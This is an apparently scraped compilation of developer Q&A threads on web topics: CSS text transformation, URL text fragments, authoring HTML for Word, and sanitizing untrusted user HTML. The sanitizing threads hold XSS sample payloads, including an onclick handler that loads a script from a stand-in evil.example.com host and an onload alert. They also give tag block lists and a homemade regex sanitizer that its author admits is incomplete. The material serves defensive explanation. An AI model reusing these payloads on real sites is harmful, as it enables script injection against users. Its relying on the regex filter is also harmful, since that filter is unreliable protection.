Display one letter as another in page while copying untransformed text - html

In CSS, .someclass { text-transform: uppercase } translates all text with class someclass to uppercase, but when I select the text, copy, and paste into a text editor or e-mail, the letters retain their original case. Does some client-side web styling technology other than CSS let a document define a custom text transformation to change things other than case, such as r to w or f to ꝼ, without having the transformation applied when the user copies the text?
Answers to Replace a particular character using css recommended JavaScript. I'd prefer to use some (non-CSS) declarative styling technology instead of script for a few reasons:
I want copy-and-paste to return the original text, not the transformed text, in the same way as the text-transform property.
I want "Find within page" (Ctrl+F) to work if the user types the untransformed letter.
I lack statistics on how many viewers of my site use NoScript or some other script whitelisting plug-in. But then skewed by the fact that I regularly visit an online forum whose users often brag about not being affected by a particular exploit because they don't run JavaScript
A script that runs onload will cause a noticeable flash of unstyled content as the lines are rewrapped.
Lately I was able to write an XSLT stylesheet to alter text nodes within the <body>, based on an answer to a question about whitelisting characters.
(Hint: match="html:body//text()" and translate().)
It fails the copy and Ctrl+F criteria, and it reportedly fails the no-FOUC criterion in browsers that try to get too clever, but it should load in just about every major browser since IE 6 even with script turned off.
However, a year ago, Google tried to kill client-side XSLT a year ago by removing it from Blink.
If Chrome, Opera, and other Chromium-based browsers end up dropping XSLT over this, no-XSLT users will probably outnumber no-script users.
Is acquiring a libre font and modifying it to include custom forms and ligatures that #font-face, font-feature-settings, and font-variant-ligatures can trigger the only way?

CSS - Cascade Style Sheets, as the name implies, it is used only to stylize the sheets (html pages). The snippet .someclass { text-transform: uppercase } is just stylizing the characters (alphabets) inside the tag with class someclass. Its not easy or can I say that its not possible to achieve your need using only CSS and not JavaScript.
According to Zach Saucier's comment for your question, "There is no good way to do this with CSS", And I too agree that.
Using JavaScript its absolutely possible. But your criteria doesn't want you to do so.
My request to you, try using JavaScript or try not using CSS.

Related

How to generate a hyperlink to specific point on page without an id/name?

Scenario/Request
I would like to send a link to someone, to a website which I don't control / can't change
As the page is quite long (11 paragraphs), I would like to point users to a specific point on webpage
However there are no ID/name attributes in the page, the content is all made-up of either un-named <h2> and <p> tags.
Scenario/Request
Is there anyway I can generate a link to something like a relative CSS anchor (e.g. the 3rd <H2> tag on page, please?
There isn't a cross-browser way to do this yet. There have been two proposals in the last decade with unofficial and/or official implementations, of which one is in active development and may soon be available as a cross-browser standard.
The first proposal was CSS Selectors as Fragment Identifiers, which would have allowed you to use a CSS selector to link to a specific element in the page via a URL fragment:
https://example.com/index.html#css(h2:nth-of-type(3))
(This does not actually represent the 3rd h2 on the page. It is not possible to write a CSS selector for that.)
A draft was written, some discussions were had (that I was personally involved in), and some proofs-of-concept in the form of browser extensions were made, but it never took off. See also CSS selector fragment support
The second proposal, and the one currently in active development, is Text Fragments, which allows you to link to arbitrary text in a URL fragment:
https://example.com/index.html#:~:text=Example Heading
The first implementation was by Google themselves in the form of an extension for Google Chrome and Microsoft Edge, but this feature has since actually been shipped in a number of Chromium-based browsers as of 2020. Try searching for a phrase in your question or my answer.

author html for ms word

my objective is to generate HTML markup to target ms word. So far my findings are, if you have all the styles inline to an element, the document, when opened in word renders properly. However it is lengthy task.
<h1 style="font-family:Arial">Inventory</h1>
This is how I try to achieve formatting. If i want to maintain a constant font across the document, in my HTML, I'd have to add font-family to all the elements like I've done above.
Later, I came across a codeproject article. http://www.codeproject.com/KB/office/Wordyna.aspx Now I am sort of convinced that you can declare the styles globally, but the styling language used and the formatting is not like CSS, and, I think its proprietary to ms word document formatting. I am looking for any tutorials/articles for this styling being used.
ps: I am aware about OpenXML etc, etc. I feel its too complex for me to implement at this point.
Word --should-- open valid (read: not Microsoft's proprietary html-ish mess) without fail as it's the rendering engine for Outlook when you open an HTML email. You could go to the effort to build a document entirely in-line (read: only best practice for Microsoft) as we do for HTML emails, but I suspect there are several different ways to skin this cat.
Personally, if I was trying to get a rich text formatted document from html to Word I'd use a tool such as PHPDocX to build a proper word document natively, then if I really wanted Word HTML I could simply hit save on Word. I've had to do similarly with Excel, where it will accept CSV, but the outcome is always better with XLSX, and there's a similar plugin to easily author a proper XLSX document.
If that's too difficult a route (and it's not that bad, trust me) then I'd stick to formatting following HTML Email rules. Simple guides are all over the web, such as here. And, since Outlook 07-current uses Word's html rendering engine, one could deduce that it has the same limitations listed here

What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, I'm hoping it's been thoroughly solved for me.
In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)
The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.
We recognize that some of this may well muck up the display of the text; that's okay.
We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).
The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.
What I've found so far:
The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
The Microsoft Anti-XSS library
What would you recommend for this task? One of the above? Something else?
For example, we want to remove things like:
script elements
link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
embed, object, applet, audio, video, and other tags that try to create objects
onclick and similar DOM0 event handler script code
hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
__________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)
So for instance, this HTML:
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s);)();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>
would become
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>
(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)
This is an older, but still relevant question.
We are using the HtmlSanitizer .Net library, which:
is open-source
is actively maintained
doesn't have the problems like Microsoft Anti-XSS library,
Is unit tested with the
OWASP XSS Filter Evasion Cheat Sheet
is special built for this (in contrast to HTML Agility Pack, which is a parser)
Also on NuGet
I am sensing you would definately need a parser that can generate a XML/DOM source so that you can apply fiter on it to produce what you are looking for.
See if HtmlTidy or Mozilla or HtmlCleaner parsers can help. HtmlCleaner has lot of configurable options which you might also want to look at. Specifically the transform section that allows you to skip the tags you doesn't require.
I would suggest using another approach. If you control the method in which the HTML is viewed I would remove all threats by using a HTML render that doesn't have a ECMA script engine, or any XSS capability. I see you are going to use the built-in WebBrowser object, and rightly so, you want to produce HTML that cannot be used to attack your users.
I recommend looking for a basic HTML display engine. One that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the javascript would just be ignored then.
This does have another problem though. You would need to ensure that the viewer you are using isn't susceptible to other types of attacks.
I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.
Interesting problem, i took some time facing it because there are a lot of things we want to remove from user imput, and even if i do a long list of things to be removed, latter on HTML can evolve and my list would have some holes.
Nonetheless i want users to input some simple things like bold, italic, paragraphs... prety simple.
No doubts the allowed things list is shorter and html can change latter on, that wont make holes on my list unless html stops supports this simple things.
So start thinking otherwise, say just what you allow, with great pain because i'm not an expert on regex (so please some regex people correct me here or improve) i coded this expression and its working form me even before HTML5 arrive.
replace(/(?!<[/]?(b|i|p|br)(\s[^<]*>|[/]>|>))<[^>]*>/gi,"")
(b|i|p|br) <- this is the list of allowed tags, feel free to add some.
this is a startpoint and thats why some regex people should improve to remove also the attributes, like onclick
if i do this:
(?!<[/]?(b|i|p|br)(\s*>|[/]>|>))<[^>]*>
tags with onclick or other stuff will be removed but the corresponding closing tags will remain, and after all we don't want those tags removed we just want to remove the tag attributes.
maybe a second regex pass with
(?!<[^<>\s]+)\s[^</>]+(?=[/>])
am i right? can this be composed into a single pass?
we still have no relation between tags (opening/closing), no great deal till now.
Can the attribute remove be write to remove all not from a white lists? (possibly yes).
a last problem.. when removing tags like script the content remains, its desirable when removing font but not script, well we can do a first pass with
<(script|object|embed)[^>]*>.*</\1>
that will remove certain tags and its content.. but its a black list, meaning you have to keep an eye on it in case html changes.
note: all with "gi"
edit:
joined all the above on this function
String.prototype.sanitizeHTML=function (white,black) {
if (!white) white="b|i|p|br";//allowed tags
if (!black) black="script|object|embed";//complete remove tags
e=new RegExp("(<("+black+")[^>]*>.*</\\2>|(?!<[/]?("+white+")(\\s[^<]*>|[/]>|>))<[^<>]*>|(?!<[^<>\\s]+)\\s[^</>]+(?=[/>]))", "gi");
return this.replace(e,"");
}
-black list -> complete remove tag and content
-white list -> retain tags
other tags are removed but tag content is retained
all attributes of white list tag's (the remaining ones) are removed
still there is place for a white list of attributes (not implemented above) because if i want to preserve IMG then the src must stay... and what about tracking images?

Any tool to show you all elements/pages in a site that are affected by a particular CSS rule?

Of course we can use tools like Firebug to highlight portions of HTML and see what all CSS is being applied.
But what about the reverse? Is there some kind of tool which would allow you to highlight a particular CSS rule and show you all the pages on a site (either static HTML pages or their dynamic templates) that it applies to?
Example: I've come to work on a new site, very large and I need to edit CSS on a particular page but in doing so, I have no idea how many other pages on the site might also have these class names and hence be affected. Of course I can try to search the whole site for the class name(s) but this can be time consuming or tricky. This site has a class named "ba" for example. Guess how many irrelevant pages will turn up if I just search for "ba"? So how about including a double quote ("ba)? Well, it could be in the middle of a few other classes (class="hz ba top"), at the end (class="hz ba"), etc. More so, it could be dynamically plugged in via server side code making it even harder to find. A tool that could somehow spider your site and be able to identify all the places your CSS change will affect would be great.
not exactly that, but there is a firebug plugin that does that for any loaded page:
http://robertnyman.com/firefinder/
You could use regular expressions ..
for example in Dreamweaver on the search dialog box :
select 'Find in: Entire current local site.."
select 'Search: Source code'
check 'Use regular expression'
in the find textarea type class\s*?=\s*?".*?content.*?"
click 'find all'
the same regular expression could be used with other software that can search inside files using regular expressions....
for example : http://www.sowsoft.com/search.htm (not affiliated with them, just found it for here..)
Keep in mind though, that all the suggestions here do not take into account the case where the class is added by script..
If you use a Mac, there's an excellent shareware app called "CSSEdit" by an Indy Mac Shop in Belgium. A single-user license is 30 euros. I've used it for approx. three years and i can recommend it highly. It's a mature, stable App (though continuously updated/improved); widely used among Mac Web Designers, and those of use who are not but need all the help we can get, which CSSEdit certainly seems to provide.
To show elements on the html page styled by a given selector:
(i) open both the style sheet and the markup page (markup page must have a link to the style sheet);
(ii) click the X-Ray button off (must read 'Not Active' below the button);
(iii) in the style editor, click any selector (i click it so that my cursor is at the left margin, e.g., in front of the '#', etc.);
(iv) now click 'inspector' on the mark-up page (next to 'X-ray').
Now, look at your mark-up page--it will have a blue outline around the elements affect by the style you clicked on in step (iii) above.
For this kind of things I just use grep, or - even better, ack.
If you're concerned about false positive when searching for short patterns, you can do a double filter: you grep all lines containing class= and you feed its output in another grep which only narrows the result down to the lines containing both class= and your search pattern (which can also be more precisely specified with a regexp using word boundaries like \bba\b to avoid matching bar or abba)
How about putting an ID on the body of each page, and use that to restrain the use of CSS outside of pages clearly stated in the CSS?
Like this:
#mypage .description,
#myotherpage . description {
}
Cons:
Must put a body ID on each page / template.
Must specify each page the CSS should apply to. More CSS code to manage.
Makes the CSS less easy to scan through with your eyes (since the line starts with the page ID and not the CSS style). This is a bigger problem if some of the CSS styles are used on several pages (since the css spec for each style would be long).
Pros:
Avoids unintentioned CSS change propagations. I.e. changing one page affects other unknown pages.
See what pages a CSS change would affect, when you're editing the CSS style itself. The information is right there; no need to search/grep for it.
Forces developers to specify what pages the CSS would affect. If you'd just included this information as comments in your CSS, some person would inevitably forget to update the comment when the CSS is used on a new page.
I agree with this statement, made by a friend:
"Minimize CSS that is used several places. It's not like programming; it's better with a little duplicate CSS, than unmanageable CSS. (Pages like apple.com, has own stylesheets for
each page, and some global CSS.)"
- Olav Bjørkøy, original creator of the Blueprint CSS framework
I'd love your input on this, or if any of you have found a better way.

Apart from <script> tags, what should I strip to make sure user-entered HTML is safe?

I have an app that reprocesses HTML in order to do nice typography. Now, I want to put it up on the web to let users type in their text. So here's the question: I'm pretty sure that I want to remove the SCRIPT tag, plus closing tags like </form>. But what else should I remove to make it totally safe?
Oh good lord you're screwed.
Take a look at this
Basically, there are so many things you want to strip out. Plus, there's stuff that's valid, but could be used in malicious ways. What if the user wants to set their font size smaller on a footnote? Do you care if that get applied to your entire page? How about setting colors? Now all the words on your page are white on a white background.
I would look into the requirements phase again.
Is a markdown-like alternative possible?
Can you restrict access to the final content, reducing risk of exposure? (meaning, can you set it up so the user only screws themselves, and can't harm other people?)
You should take the white-list rather than the black-list approach: Decide which features are desired, rather than try to block any unwanted feature.
Make a list of desired typographic features that match your application. Note that there is probably no one-size-fits-all list: It depends both on the nature of the site (programming questions? teenagers' blog?) and the nature of the text box (are you leaving a comment or writing an article?). You can take a look at some good and useful text boxes in open source CMSs.
Now you have to chose between your own markup language and HTML. I would chose a markup language. The pros are better security, the cons are incapability to add unexpected internet contents, like youtube videos. A good idea to prevent users' rage is adding an "HTML to my-site" feature that translates the corresponding HTML tags to your markup language, and delete all other tags.
The pros for HTML are consistency with standards, extendability to new contents types and simplicity. The big con is code injection security issues. Should you pick HTML tags, try to adopt some working system for filtering HTML (I think Drupal is doing quite a good job in this case).
Instead of blacklisting some tags, it's always safer to whitelist. See what stackoverflow does: What HTML tags are allowed on Stack Overflow?
There are just too many ways to embed scripts in the markup. javascript: URLs (encoded of course)? CSS behaviors? I don't think you want to go there.
There are plenty of ways that code could be sneaked in - especially watch for situations like <img src="http://nasty/exploit/here.php"> that can feed a <script> tag to your clients, I've seen <script> blocked on sites before, but the tag got right through, which resulted in 30-40 passwords stolen.
<iframe>
<style>
<form>
<object>
<embed>
<bgsound>
Is what I can think of. But to be sure, use a whitelist instead - things like <a>, <img>† that are (mostly) harmless.
† Just make sure that any javascript:... / on*=... are filtered out too... as you can see, it can get quite complicated.
I disagree with person-b. You're forgetting about javascript attributes, like this:
<img src="xyz.jpg" onload="javascript:alert('evil');"/>
Attackers will always be more creative than you when it comes to this. Definitely go with the whitelist approach.
MediaWiki is more permissive than this site; yes, it accepts setting colors (even white on white), margins, indents and absolute positioning (including those that would put the text completely out of screen), null, clippings and "display;none", font sizes (even if they are ridiculously small or excessively large) and font-names (even if this is a legacy non-Unicode Symbol font name that will not render text successfully), as opposed to this site which strips out almost everything.
But MediaWiki successifully strips out the dangerous active scripts from CSS (i.e. the behaviors, the onEvent handlers, the active filters or javascript link targets) without filtering completely the style attribute, and bans a few other active elements like object, embed, bgsound.
Both sits are banning marquees as well (not standard HTML, and needlessly distracting).
But MediaWiki sites are patrolled by lots of users and there are policy rules to ban those users that are abusing repeatedly.
It offers support for animated iamges, and provides support for active extensions, such as to render TeX maths expressions, or other active extensions that have been approved (like timeline), or to create or customize a few forms.